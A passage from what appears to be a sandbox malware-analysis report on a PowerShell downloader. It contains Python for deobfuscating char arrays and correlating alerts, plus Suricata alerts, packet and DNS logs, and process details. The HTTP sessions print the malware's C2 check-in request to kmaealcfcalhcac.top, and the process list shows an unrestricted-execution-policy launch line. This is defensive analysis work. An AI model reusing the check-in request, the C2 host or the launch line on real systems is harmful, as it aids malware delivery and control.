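    text is never executed. PowerShell's '/' is floating-point division; the obfuscator
    only emits exact quotients (assumption), so an inexact division is rejected too.
    """
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) is int:
            return node.value
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -walk(node.operand)
        if isinstance(node, ast.BinOp):
            left, right = walk(node.left), walk(node.right)
            if isinstance(node.op, ast.Div):
                if right == 0 or left % right != 0:
                    raise ValueError(f"inexact division in {text!r}")
                return left // right
            if type(node.op) in _BINOPS:
                return _BINOPS[type(node.op)](left, right)
        raise ValueError(f"unsupported syntax in {text!r}")

    return walk(ast.parse(text.strip(), mode="eval"))


def try_eval(text: str):
    """eval_int_expr, but None instead of an exception (useful when scanning many candidates)."""
    try:
        return eval_int_expr(text)
    except (ValueError, SyntaxError):
        return None


def extract_char_array(script: str) -> list:
    """Return the top-level elements of the first [char[]]@( ... ) array in the script."""
    m = re.search(r"\[char\[\]\]\s*@\(", script, re.IGNORECASE)
    if not m:
        raise ValueError("no [char[]]@( array found")
    elems, depth, start = [], 0, m.end()
    for i in range(m.end(), len(script)):
        c = script[i]
        if c == "(":
            depth += 1
        elif c == ")":
            if depth == 0:                      # this ")" closes the @( ... ) array itself
                elems.append(script[start:i])
                return elems
            depth -= 1
        elif c == "," and depth == 0:
            elems.append(script[start:i])
            start = i + 1
    raise ValueError("unterminated [char[]] array")


def decode_char_array(script: str) -> str:
    """Evaluate every element of the array and join the resulting characters."""
    return "".join(chr(eval_int_expr(e)) for e in extract_char_array(script))


if __name__ == "__main__":
    print(decode_char_array(PREVIEW_EXCERPT))
```

The nine visible elements decode to the digits 549286877 rather than to readable PowerShell, which suggests this layer produces a further encoded string that the rest of the 20 KB script unpacks; run the same decoder on the full file and feed its output back in until something readable appears.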
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T09:45:39.301965+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.11.30 | 52799 | 23.45.46.170 | 443 | TCP
2025-01-11T09:45:40.368167+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.11.30 | 52800 | 45.61.136.138 | 80 | TCP
2025-01-11T09:45:40.368167+0100 | 2057741 | ET MALWARE TA582 CnC Checkin | 1 | 192.168.11.30 | 52800 | 45.61.136.138 | 80 | TCP
2025-01-11T09:45:40.726140+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.11.30 | 52801 | 142.250.191.196 | 80 | TCP
2025-01-11T09:46:42.801954+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.11.30 | 52803 | 23.45.46.170 | 443 | TCP
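When triaging a report like this one it helps to join the alert table to the packet list on the client source port, so that each alert carries the time since its flow started and each destination gets its worst severity (in Suricata, 1 is the most severe). As an added example, not part of the report, the Python below does that for the rows above using the report's own timestamp formats; the flow start times are the first client packet of the 52800 and 52801 flows from the TCP packet list that follows, and the two 23.45.46.170 alerts stay unmatched only because their packets are not in this part of the list.

```python
import re
from datetime import datetime, timedelta, timezone

CET = timezone(timedelta(hours=1))

# Alert rows copied from the report's Suricata table:
# (timestamp, SID, signature, severity, source port, destination IP, destination port).
ALERTS = [
    ("2025-01-11T09:45:39.301965+0100", 2028371, "ET JA3 Hash - Possible Malware - Fake Firefox Font Update", 3, 52799, "23.45.46.170", 443),
    ("2025-01-11T09:45:40.368167+0100", 1810000, "Joe Security ANOMALY Windows PowerShell HTTP activity", 2, 52800, "45.61.136.138", 80),
    ("2025-01-11T09:45:40.368167+0100", 2057741, "ET MALWARE TA582 CnC Checkin", 1, 52800, "45.61.136.138", 80),
    ("2025-01-11T09:45:40.726140+0100", 1810000, "Joe Security ANOMALY Windows PowerShell HTTP activity", 2, 52801, "142.250.191.196", 80),
    ("2025-01-11T09:46:42.801954+0100", 2028371, "ET JA3 Hash - Possible Malware - Fake Firefox Font Update", 3, 52803, "23.45.46.170", 443),
]

# First client packet of each TCP flow present in this part of the report's packet list,
# in the report's own timestamp format: (timestamp, source port, destination IP, destination port).
FLOW_STARTS = [
    ("Jan 11, 2025 09:45:39.814882040 CET", 52800, "45.61.136.138", 80),
    ("Jan 11, 2025 09:45:40.441776037 CET", 52801, "142.250.191.196", 80),
]


def parse_alert_ts(s: str) -> datetime:
    """'2025-01-11T09:45:40.368167+0100' -> aware datetime."""
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S.%f%z")


def parse_packet_ts(s: str) -> datetime:
    """'Jan 11, 2025 09:45:39.814882040 CET': keep microseconds, drop the nanosecond digits."""
    m = re.fullmatch(r"(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d{6})\d{0,3} CET", s)
    if not m:
        raise ValueError(f"unexpected packet timestamp: {s!r}")
    return datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S.%f").replace(tzinfo=CET)


def build_timeline(alerts, flow_starts):
    """Join alerts to flows on the client port; return (flows ordered by first packet, unmatched alerts)."""
    flows = {}
    for ts, sport, dip, dport in flow_starts:
        flows[sport] = {"src_port": sport, "dst": (dip, dport), "first_seen": parse_packet_ts(ts), "alerts": []}
    unmatched = []
    for ts, sid, sig, sev, sport, dip, dport in alerts:
        flow = flows.get(sport)
        if flow is None or flow["dst"] != (dip, dport):
            unmatched.append((sid, sport, dip, dport))
            continue
        delay = round((parse_alert_ts(ts) - flow["first_seen"]).total_seconds(), 6)
        flow["alerts"].append({"sid": sid, "signature": sig, "severity": sev, "seconds_after_flow_start": delay})
    timeline = sorted(flows.values(), key=lambda f: f["first_seen"])
    for f in timeline:
        # Suricata severity 1 is the most severe, so the "worst" alert has the lowest number.
        f["worst_severity"] = min((a["severity"] for a in f["alerts"]), default=None)
    return timeline, unmatched


def flows_to_block(timeline, worst_severity=1):
    """Destinations whose worst alert is at severity `worst_severity` or more severe."""
    return [f["dst"] for f in timeline
            if f["worst_severity"] is not None and f["worst_severity"] <= worst_severity]


if __name__ == "__main__":
    timeline, unmatched = build_timeline(ALERTS, FLOW_STARTS)
    for f in timeline:
        print(f["first_seen"].time(), f["src_port"], f["dst"], f["worst_severity"],
              [(a["sid"], a["seconds_after_flow_start"]) for a in f["alerts"]])
    print("unmatched:", unmatched)
    print("block:", flows_to_block(timeline))
```

On this data the severity-1 TA582 check-in on 45.61.136.138:80 fires 0.553 s after the flow's first packet, and the next flow, to 142.250.191.196:80 (the "Queries Google from non browser process on port 80" behaviour), starts 74 ms after that alert; the alert-to-flow join is what makes such ordering visible without reading the raw packet list.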
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 09:45:39.814882040 CET | 52800 | 80 | 192.168.11.30 | 45.61.136.138
Jan 11, 2025 09:45:39.990837097 CET | 80 | 52800 | 45.61.136.138 | 192.168.11.30
Jan 11, 2025 09:45:39.991172075 CET | 52800 | 80 | 192.168.11.30 | 45.61.136.138
Jan 11, 2025 09:45:39.996438026 CET | 52800 | 80 | 192.168.11.30 | 45.61.136.138
Jan 11, 2025 09:45:40.170646906 CET | 80 | 52800 | 45.61.136.138 | 192.168.11.30
Jan 11, 2025 09:45:40.316673040 CET | 80 | 52800 | 45.61.136.138 | 192.168.11.30
Jan 11, 2025 09:45:40.368166924 CET | 52800 | 80 | 192.168.11.30 | 45.61.136.138
Jan 11, 2025 09:45:40.441776037 CET | 52801 | 80 | 192.168.11.30 | 142.250.191.196
Jan 11, 2025 09:45:40.560199022 CET | 80 | 52801 | 142.250.191.196 | 192.168.11.30
Jan 11, 2025 09:45:40.560401917 CET | 52801 | 80 | 192.168.11.30 | 142.250.191.196
Jan 11, 2025 09:45:40.560513973 CET | 52801 | 80 | 192.168.11.30 | 142.250.191.196
Jan 11, 2025 09:45:40.679049015 CET | 80 | 52801 | 142.250.191.196 | 192.168.11.30
Jan 11, 2025 09:45:40.725843906 CET | 80 | 52801 | 142.250.191.196 | 192.168.11.30
Jan 11, 2025 09:45:40.725964069 CET | 80 | 52801 | 142.250.191.196 | 192.168.11.30
Jan 11, 2025 09:45:40.726090908 CET | 80 | 52801 | 142.250.191.196 | 192.168.11.30
Jan 11, 2025 09:45:40.726134062 CET | 80 | 52801 | 142.250.191.196 | 192.168.11.30
Jan 11, 2025 09:45:40.726140022 CET | 52801 | 80 | 192.168.11.30 | 142.250.191.196
Jan 11, 2025 09:45:40.726290941 CET | 80 | 52801 | 142.250.191.196 | 192.168.11.30
Jan 11, 2025 09:45:40.726308107 CET | 52801 | 80 | 192.168.11.30 | 142.250.191.196
Jan 11, 2025 09:45:40.726372957 CET | 80 | 52801 | 142.250.191.196 | 192.168.11.30
Jan 11, 2025 09:45:40.726511955 CET | 80 | 52801 | 142.250.191.196 | 192.168.11.30
Jan 11, 2025 09:45:40.726624966 CET | 80 | 52801 | 142.250.191.196 | 192.168.11.30
Jan 11, 2025 09:45:40.726638079 CET | 52801 | 80 | 192.168.11.30 | 142.250.191.196
Jan 11, 2025 09:45:40.726720095 CET | 80 | 52801 | 142.250.191.196 | 192.168.11.30
Jan 11, 2025 09:45:40.726886034 CET | 80 | 52801 | 142.250.191.196 | 192.168.11.30
Jan 11, 2025 09:45:40.726991892 CET | 52801 | 80 | 192.168.11.30 | 142.250.191.196
Jan 11, 2025 09:45:40.727173090 CET | 52801 | 80 | 192.168.11.30 | 142.250.191.196
Jan 11, 2025 09:45:40.844624996 CET | 80 | 52801 | 142.250.191.196 | 192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.844726086 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.844964027 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.848927021 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.849025965 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.849200010 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.857578039 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.857676983 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.857898951 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.866234064 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.866326094 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.866527081 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.874912024 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.875046015 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.875250101 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.883621931 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.883733988 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.883924007 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.892096996 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.892324924 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.892503977 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.900736094 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.900829077 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.901083946 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.909446001 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.909547091 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.909776926 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.918045998 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.918284893 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.918438911 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.963459015 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.963577986 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.963833094 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.967744112 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.967847109 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.968060970 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.976425886 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.976527929 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.976759911 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.983928919 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.984153032 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.984338045 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.991415977 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.991518974 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.991692066 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:40.998910904 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.998999119 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:40.999185085 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:41.006324053 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:41.006465912 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:41.006711006 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:41.013740063 CET8052801142.250.191.196192.168.11.30
                                                                                                            Jan 11, 2025 09:45:41.055540085 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:41.219929934 CET5280180192.168.11.30142.250.191.196
                                                                                                            Jan 11, 2025 09:45:41.220762014 CET5280080192.168.11.3045.61.136.138
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 09:45:39.606645107 CET | 50796 | 53 | 192.168.11.30 | 1.1.1.1
Jan 11, 2025 09:45:39.803500891 CET | 53 | 50796 | 1.1.1.1 | 192.168.11.30
Jan 11, 2025 09:45:40.321235895 CET | 54065 | 53 | 192.168.11.30 | 1.1.1.1
Jan 11, 2025 09:45:40.440736055 CET | 53 | 54065 | 1.1.1.1 | 192.168.11.30
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 09:45:39.606645107 CET | 192.168.11.30 | 1.1.1.1 | 0x268a | Standard query (0) | kmaealcfcalhcac.top | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:45:40.321235895 CET | 192.168.11.30 | 1.1.1.1 | 0x742a | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 09:45:39.803500891 CET | 1.1.1.1 | 192.168.11.30 | 0x268a | No error (0) | kmaealcfcalhcac.top | | 45.61.136.138 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 09:45:40.440736055 CET | 1.1.1.1 | 192.168.11.30 | 0x742a | No error (0) | www.google.com | | 142.250.191.196 | A (IP address) | IN (0x0001) | false

• kmaealcfcalhcac.top
• www.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.30 | 52800 | 45.61.136.138 | 80 | 8624 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:45:39.996438026 CET | 215 | OUT | GET /36aol1ybpfhtr.php?id=computer&key=67225157272&s=527 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
Host: kmaealcfcalhcac.top
Connection: Keep-Alive
Jan 11, 2025 09:45:40.316673040 CET | 166 | IN | HTTP/1.1 302 Found
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 11 Jan 2025 08:45:40 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.google.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.30 | 52801 | 142.250.191.196 | 80 | 8624 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:45:40.560513973 CET | 159 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
Host: www.google.com
Connection: Keep-Alive
Jan 11, 2025 09:45:40.725843906 CET | 1289 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 08:45:40 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-ils713Qx1Uk8tr0XAmAxgg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-XxE8ij8Y-AxKz1IC1-H9WXG2CEg9Yzo7Z0dPbAOuAxIzoxn10-Sg; expires=Thu, 10-Jul-2025 08:45:40 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: NID=520=dRJuEk70uQCMDlmub_wRmltadR9EiqMdmsHi-H6uQVsRh1o5FQ5GvzJvOjo0ZiJAGMwrtEnUXYxJ2BhhugEqwQPVdoXN-4ni0UXu-jMVCcezUIzjhOSfD3dQpIzbigDw54TrCbzbyZznZYoEDKfbkuvpTvrKJOo914D49EG0tVKPAnm8BWa1KsqXDvL7NtJZEU8EWgDm; expires=Sun, 13-Jul-2025 08:45:40 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
Data Raw: 35 35 39 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68
Data Ascii: 559c<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has many special features to h
Jan 11, 2025 09:45:40.725964069 CET | 1289 | IN | Data Raw: 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e
Data Ascii: elp you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.
Jan 11, 2025 09:45:40.726090908 CET | 1289 | IN | Data Raw: 32 2c 32 32 2c 31 34 33 2c 39 34 2c 38 37 2c 36 33 38 2c 37 32 34 2c 35 2c 39 32 31 2c 31 33 36 2c 35 34 35 2c 38 38 34 2c 32 34 2c 36 35 31 2c 33 34 2c 32 33 2c 33 39 39 2c 38 2c 32 31 36 2c 31 31 2c 34 35 32 2c 34 30 2c 31 32 39 39 2c 33 31 31
Data Ascii: 2,22,143,94,87,638,724,5,921,136,545,884,24,651,34,23,399,8,216,11,452,40,1299,311,264,152,6,269,2,84,286,406,375,2,61,180,172,533,450,142,256,347,57,5,412,229,181,274,59,211,563,139,119,222,92,182,33,139,2644,1151,4,699,2873,473,164,3,418,641
Jan 11, 2025 09:45:40.726134062 CET | 1289 | IN | Data Raw: 3d 22 2b 53 74 72 69 6e 67 28 61 29 2b 22 26 63 61 64 3d 22 2b 28 62 2b 65 2b 63 29 7d 3b 6c 3d 67 6f 6f 67 6c 65 2e 6b 45 49 3b 67 6f 6f 67 6c 65 2e 67 65 74 45 49 3d 6e 3b 67 6f 6f 67 6c 65 2e 67 65 74 4c 45 49 3d 70 3b 67 6f 6f 67 6c 65 2e 6d
Data Ascii: ="+String(a)+"&cad="+(b+e+c)};l=google.kEI;google.getEI=n;google.getLEI=p;google.ml=function(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a
Jan 11, 2025 09:45:40.726290941 CET | 1289 | IN | Data Raw: 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 61 3b 61 3a 7b 66 6f 72 28 61 3d 62 2e 74 61 72 67 65 74 3b 61 26 26 61 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 61 3d 61 2e 70 61
Data Ascii: "click",function(b){var a;a:{for(a=b.target;a&&a!==document.documentElement;a=a.parentElement)if(a.tagName==="A"){a=a.getAttribute("data-nohref")==="1";break a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gb{font:13px/27px Ar
Jan 11, 2025 09:45:40.726372957 CET | 1289 | IN | Data Raw: 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 67 62 72 74 6c 20 2e 67 62 6d 7b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 31 70 78
Data Ascii: rgba(0,0,0,.2);box-shadow:0 2px 4px rgba(0,0,0,.2)}.gbrtl .gbm{-moz-box-shadow:1px 1px 1px rgba(0,0,0,.2)}.gbto .gbm,.gbto #gbs{top:29px;visibility:visible}#gbz .gbm{left:0}#gbg .gbm{right:0}.gbxms{background-color:#ccc;display:block;position:
Jan 11, 2025 09:45:40.726511955 CET | 1289 | IN | Data Raw: 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 73 70 61 6e 23 67 62 67 36 2c 73 70 61 6e 23 67 62 67 34 7b
Data Ascii: {cursor:pointer;display:block;text-decoration:none !important}span#gbg6,span#gbg4{cursor:default}.gbts{border-left:1px solid transparent;border-right:1px solid transparent;display:block;*display:inline-block;padding:0 5px;position:relative;z-i
Jan 11, 2025 09:45:40.726624966 CET | 1289 | IN | Data Raw: 65 7d 2e 67 62 67 34 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 7d 2e 67 62 67 34 61 20 2e 67 62 74 73 7b 70 61 64 64 69 6e 67 3a 32 37 70 78 20 35 70 78 20 30 3b 2a 70 61 64 64 69 6e 67 3a 32 35 70 78 20 35
Data Ascii: e}.gbg4a{font-size:0;line-height:0}.gbg4a .gbts{padding:27px 5px 0;*padding:25px 5px 0}.gbto .gbg4a .gbts{padding:29px 5px 1px;*padding:27px 5px 1px}#gbi4i,#gbi4id{left:5px;border:0;height:24px;position:absolute;top:1px;width:24px}.gbto #gbi4i
Jan 11, 2025 09:45:40.726720095 CET | 1289 | IN | Data Raw: 31 30 70 78 7d 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 31 3a 76 69 73
Data Ascii: 10px}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{*display:inline}.gbml1,.gbml1:visited{padding:0 10px}.gbml1-hvr,.gbml1:focus{outline:none;text-decoration:underline !important}#gbpm .gbml1{display:inline;margin:0;padding:0;white-space:nowrap}.
Jan 11, 2025 09:45:40.726886034 CET | 1289 | IN | Data Raw: 6d 74 63 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 7d 23 67 62 64 34 20 2e 67 62 70 63 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 31 36 70 78 20 30
Data Ascii: mtc{border-bottom:1px solid #bebebe}#gbd4 .gbpc{display:inline-block;margin:16px 0 10px;padding-right:50px;vertical-align:top}#gbd4 .gbpc{*display:inline}.gbpc .gbps,.gbpc .gbps2{display:block;margin:0 20px}#gbmplp.gbps{margin:0 10px}.gbpc .gb
Jan 11, 2025 09:45:40.844624996 CET | 1289 | IN | Data Raw: 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 67 62 6d 70 69 61 61 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 67 62 6d 70 69 61 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 64 69 73 70 6c 61 79 3a
Data Ascii: ibility:hidden}.gbmpiaa{display:block;margin-top:10px}.gbmpia{border:none;display:block;height:48px;width:48px}.gbmpnw{display:inline-block;height:auto;margin:10px 0;vertical-align:top}.gbqfb,.gbqfba,.gbqfbb{-moz-border-radius:2px;-webkit-bor


Target ID: 1
Start time: 03:45:35
Start date: 11/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Imagebase: 0x7ff7d6220000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 03:45:35
Start date: 11/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff77ee10000
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true
